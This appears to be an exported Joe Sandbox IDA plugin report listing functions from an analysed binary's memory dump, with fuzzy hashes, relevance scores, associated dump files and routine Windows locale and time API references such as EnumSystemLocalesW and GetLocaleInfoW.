Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: ca964caaba23465a121e765f6cecf64369d936127c0b783337c13d9a8bac632e
Instruction ID: 1e411a119026393f2d2966c5c9c2c14aff894e2db205599c5e34797d9af96e2f
Opcode Fuzzy Hash: ca964caaba23465a121e765f6cecf64369d936127c0b783337c13d9a8bac632e
Instruction Fuzzy Hash: 64B1C138A0060A8ACBA4DF59C540FBFB7B1AF46704F10491FE852E7362D778AD46CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004C2157 Relevance: 1.6, Strings: 1, Instructions: 322COMMON

Download Yara Rule

Strings

0, xrefs: 004C22EF

Memory Dump Source

Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: d5d055db0232bf617d23ef99520a02c68bce755e499eaecd57978063a32a3384
Instruction ID: a40f955522a4920992760e8c77c8bcd6e06d480034f969f5e22b3b20a524287b
Opcode Fuzzy Hash: d5d055db0232bf617d23ef99520a02c68bce755e499eaecd57978063a32a3384
Instruction Fuzzy Hash: BFB1E078A006098BCBA8CF68C680FBFB7B1BF44314F14451FD856A7351DAF8A946CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004C18C8 Relevance: 1.6, Strings: 1, Instructions: 322COMMON

Download Yara Rule

Strings

0, xrefs: 004C1A60

Memory Dump Source

Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 62fc267334c1188c7a53090e065c5dbaa731f617b8e435e0fdeafe4eaf9742b6
Instruction ID: 038f61d4090b187b136baad614aab3b12ab9b8cb8f03fb0ecc40a6ff32f0d28b
Opcode Fuzzy Hash: 62fc267334c1188c7a53090e065c5dbaa731f617b8e435e0fdeafe4eaf9742b6
Instruction Fuzzy Hash: 73B11278A006098ACBA4CF68C590FBFB7F1AF46304F10451FD456A7362E639ED46CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004DA4A3 Relevance: 1.6, Instructions: 1571COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68f0b5e7c7923da775fa1c3c5574be257a1dc8c54a0bcf1d155b0c0a45fb064a
Instruction ID: 3b603610cb15fd8ce77a55674a75ffb98d934c96e9d38073edf4dc7249a06b12
Opcode Fuzzy Hash: 68f0b5e7c7923da775fa1c3c5574be257a1dc8c54a0bcf1d155b0c0a45fb064a
Instruction Fuzzy Hash: EB72F074A0020A9FCF28CF68C8A1ABEB7B5EF45304F24416FED4597345D639AE16CB85

Uniqueness

Uniqueness Score: -1.00%

Function 004C031C Relevance: 1.6, Strings: 1, Instructions: 318COMMON

Download Yara Rule

Strings

0, xrefs: 004C04B5

Memory Dump Source

Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 5cd2c093a0cf841456b437c346ce9330891c5008c248fad56b0a7296069cd642
Instruction ID: 368d77a6116f4dc227478e824ed04ab58f49fe0066e8fe50ef9d0c06e06fd7d4
Opcode Fuzzy Hash: 5cd2c093a0cf841456b437c346ce9330891c5008c248fad56b0a7296069cd642
Instruction Fuzzy Hash: F4B1D478A0064ADBCFA8CF68C551FBFB7A1AB41308F14061FD952973A1C738A946CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 004C0748 Relevance: 1.6, Strings: 1, Instructions: 314COMMON

Download Yara Rule

Strings

0, xrefs: 004C08D2

Memory Dump Source

Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 23f29a1367b7a7cb9fa0874a208198d938464fb330570270a55c022a116111ac
Instruction ID: 46c2194ed0d7e0132b840905bb56c1cecde38b7cc7d097f21f993cf2f439ff53
Opcode Fuzzy Hash: 23f29a1367b7a7cb9fa0874a208198d938464fb330570270a55c022a116111ac
Instruction Fuzzy Hash: CEB1E47890070ACBCBA89F68C451FBFB7A1AF54304F14461FD49297392C73DA946CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004BFF02 Relevance: 1.6, Strings: 1, Instructions: 314COMMON

Download Yara Rule

Strings

0, xrefs: 004C008C

Memory Dump Source

Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 03cd71536961c5bf2b70fefa0bd56ca2c8afe310552a490e84392e490dd7474b
Instruction ID: 29c7413617db4445cc9ec466933098f8f59c5ef8f9a6816d9753ec1d2b7d84d1
Opcode Fuzzy Hash: 03cd71536961c5bf2b70fefa0bd56ca2c8afe310552a490e84392e490dd7474b
Instruction Fuzzy Hash: B5B1043490060ACBCB648F69C854BBFB7A4AB01304F14462FD956D7391CB3DAD46CB5E

Uniqueness

Uniqueness Score: -1.00%

Function 004F3402 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(004F3570,00000001), ref: 004F3474

Memory Dump Source

Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 29d9b31b8782845f23065cde291d560e5799fdd6c79a31b158b1877dc30cbc20
Instruction ID: 313a27cff687417585c3c3941e91f7ffafe5122c7b7ec1e4d7a76b5a758c3e0d
Opcode Fuzzy Hash: 29d9b31b8782845f23065cde291d560e5799fdd6c79a31b158b1877dc30cbc20
Instruction Fuzzy Hash: B21129362007095FDB189F39C89167AB792FF8035AB14442DEA4687B40D375AA42C744

Uniqueness

Uniqueness Score: -1.00%

Function 004F3B11 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004F378C,00000000,00000000,?), ref: 004F3B3D

Memory Dump Source

Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: ede05c128f489eda554aac31df035d30fe319062be8c10a730dfc8b2daeb79a3
Instruction ID: bcf5dc35fe8a67790a0ee2cddaaccc3a5069d49c9edf10d0b207ddf64c78716a
Opcode Fuzzy Hash: ede05c128f489eda554aac31df035d30fe319062be8c10a730dfc8b2daeb79a3
Instruction Fuzzy Hash: ABF02D3260011ABBDF289F25CC15BBB7758DB40356F04056AEE05A3281DA78FF41C594

Uniqueness

Uniqueness Score: -1.00%

Function 004F34C3 Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(004F3857,00000001), ref: 004F350D

Memory Dump Source

Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 29cfb8ce3597b5a548ec11b105ce9718de43d9cb3ccf792cd583601fe76d56c1
Instruction ID: e7cbd42dc5f54bdac25c19291f277a7a96c6495d42e9a710e30c3f7ec29e47cb
Opcode Fuzzy Hash: 29cfb8ce3597b5a548ec11b105ce9718de43d9cb3ccf792cd583601fe76d56c1
Instruction Fuzzy Hash: 5FF0F6363003086FDB146F39E881A7B7BD1EFC176DF15442EFA054B690C6B9AE41D614

Uniqueness

Uniqueness Score: -1.00%

Function 004E4E2A Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(Function_00094E14,00000001,0051E078,0000000C), ref: 004E4E62

Memory Dump Source

Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 7a6805b5071285b0e7546d2d415f6e7250615f301528c7f6a2990381b3ab5742
Instruction ID: 5ce67a27318437cac90860e0c2956961f796b97df4232533da9d500b05a39de0
Opcode Fuzzy Hash: 7a6805b5071285b0e7546d2d415f6e7250615f301528c7f6a2990381b3ab5742
Instruction Fuzzy Hash: 30F03C36A40300DFD700DF99D806B9C77B0FB49726F10816AF800AB2A1C7B94909DF98

Uniqueness

Uniqueness Score: -1.00%

Function 00495A6A Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

GetLocaleInfoEx.KERNEL32(?,00000022,00000000,00000002), ref: 00495A83

Memory Dump Source

Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 24315f5e4b0b66686a697a1950e132695ec5e79e1fcfecae3e72ca2c13dc94e3
Instruction ID: a837180e19ac97de2744c4bde7b33e9e9c0a99c9ddd4ccb067f75bb009e6c21e
Opcode Fuzzy Hash: 24315f5e4b0b66686a697a1950e132695ec5e79e1fcfecae3e72ca2c13dc94e3
Instruction Fuzzy Hash: 90E0D13225020475DF069BBD9D4FF673A99E70170AF508352F103D51D1D9B8CA00D35D

Uniqueness

Uniqueness Score: -1.00%

Function 004F3380 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(004F32B0,00000001), ref: 004F33B7

Memory Dump Source

Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 77a11a58083bbc1338b912f0a075fa191b514283026a057b04ae3cbaf88c5812
Instruction ID: 1c803f4432b82ca1c3ba950854e90530ec0cf05c23c90354773aa55245dfd82f
Opcode Fuzzy Hash: 77a11a58083bbc1338b912f0a075fa191b514283026a057b04ae3cbaf88c5812
Instruction Fuzzy Hash: BAF0553630020997CB04DF3AC809A7BBF90EFC1729F06409EEF058B690CA799942C794

Uniqueness

Uniqueness Score: -1.00%

Function 004E5B74 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,?,?), ref: 004E5BA8

Memory Dump Source

Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 796af419431ddbbeafb796782d0cd2a20c054702513ddbebee74d04d88ef4935
Instruction ID: 0655dec4b3e1c74b248abcebed6395e944a27ba26dd8731bd0dd283f99111b9b
Opcode Fuzzy Hash: 796af419431ddbbeafb796782d0cd2a20c054702513ddbebee74d04d88ef4935
Instruction Fuzzy Hash: 10E04F3250065CBFCF232F62DC04EAE3F1AEF54766F004016FD4566222CB759D21AA99

Uniqueness

Uniqueness Score: -1.00%

Function 004E5019 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(Function_00094E14,00000001), ref: 004E5033

Memory Dump Source

Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: b534dcbe15c5cda44bb52f3a7c6b3d419d4a9c8d5ad979126acd7d25b3481e94
Instruction ID: 085c406f3e31de647d5b29d1d09775055f5ca64699a38b6c56cf71743467ba00
Opcode Fuzzy Hash: b534dcbe15c5cda44bb52f3a7c6b3d419d4a9c8d5ad979126acd7d25b3481e94
Instruction Fuzzy Hash: 1BD0A936448744AFCB009F9BEC0B9243B66F390711F40002AF808073A0EAF2684AEF88

Uniqueness

Uniqueness Score: -1.00%

Function 004E5BC2 Relevance: 1.3, Strings: 1, Instructions: 23COMMON

Download Yara Rule

Strings

GetSystemTimePreciseAsFileTime, xrefs: 004E5BC8, 004E5BD2

Memory Dump Source

Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID:
String ID: GetSystemTimePreciseAsFileTime
API String ID: 0-595813830
Opcode ID: 51543e8c81787a008a8fe04c06abc352ff06798aefac9fa05ba457fdbcaefa6b
Instruction ID: b6087c4bc0d5c7b6a8335eb2f85ad453f278e8e11a3876440e1126069ec2eb64
Opcode Fuzzy Hash: 51543e8c81787a008a8fe04c06abc352ff06798aefac9fa05ba457fdbcaefa6b
Instruction Fuzzy Hash: 3FE02B367C062877E610268B6C0AEDE7F05E750BB3F040072FA1C56242DAF948A0C6E5

Uniqueness

Uniqueness Score: -1.00%

Function 004F293F Relevance: .6, Instructions: 558COMMON

Download Yara Rule

Memory Dump Source

